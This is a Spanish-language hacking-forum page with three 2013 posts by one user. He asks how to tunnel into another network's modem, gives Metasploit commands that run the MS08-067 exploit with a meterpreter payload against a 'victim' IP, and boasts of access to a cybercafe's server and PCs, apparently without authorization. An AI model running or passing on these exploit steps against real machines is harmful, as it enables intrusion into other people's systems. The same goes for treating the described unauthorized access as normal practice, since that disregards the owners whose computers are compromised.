elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / tuneling en: 5 Noviembre 2013, 09:12 am
hola alguien que tenga paciencia con este novato jaja .
 lo que quiero aprender hacer es un túnel hacia otro MODEM para que quede mi PC en la misma red se entiende? y ya tengo un túnel con un PC de un Cyber, no se quien lo hizo pero supongo que el del Cyber no x que tengo acceso a todo el Cyber creo que hay un tercero en esto estuve revisando mi modem y se por donde se conecta su red pero no pude sacar mucha información por eso me gustaría aprender , el que responda o sepa como hacer que sea expesifico por favor .gracias
2  Seguridad Informática / Hacking / Re: No consigo meterpreter pero si la shell en: 5 Noviembre 2013, 08:52 am
amigo intenta esto y después comenta:
 use exploit /windows/smb/ms08_067_netapi
set rhost 192.xxx.x.xx (ip victima )
set payload windows/meterpreter/bind_tcp
set lhost 192.xxx.x.xx (ip atacante)
explloit
 si tu sistema es xp virgen (pelado ) si no consigues el Shell lee esto quizás hay esta tu respuesta http://www.blackploit.com/2009/11/por-que-no-consigo-shell-con-mi.html
3  Seguridad Informática / Hacking / Re: [Ayuda] Metasploit winxp sp3 no consigo la shell en: 5 Noviembre 2013, 08:34 am
amigo yo también soy un poco nuevo en esto te comento que por mas viejo que sea esa vulnerabilidad aun funciona muy bien hay muchas gente que instala sus equipos y no los actualiza, en mi caso tengo una red vendo Internet a mis vecinos tengo aproximadamente unas 25 PC mas ahora tengo un túnel hacia otro MODEM de un Cyber y se sumaron unas 8 PC + de esas 8 en 2 PC tengo acceso al servidor y a la pche... con el mismo exploit que tu mencionas , a y en 1 + de las 25 PC que por cierto instale yo esa PC jaja .
 bueno lo que te quería decir es que tu problema puede ser este (Cuando se ejecuta un exploit sobre sistemas Microsoft Windows este comportamiento puede venir derivado porque el exploit haya sido realizado para atacar una versión determinada de Microsoft Windows, con un determinado lenguaje, como por ejemplo podría estar preparado para "Microsoft Windows XP SP0 English". Si el pentester lanza el exploit sobre un sistema con "Microsoft Windows XP SP3 Spanish", el exploit no será igual de efectivo que en la versión "English") bueno mejor te dejo el link para que lo leas y si logras hacer esto avísame yo no logre entender bien como se hace el cambio . http://www.blackploit.com/2009/11/por-que-no-consigo-shell-con-mi.html
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines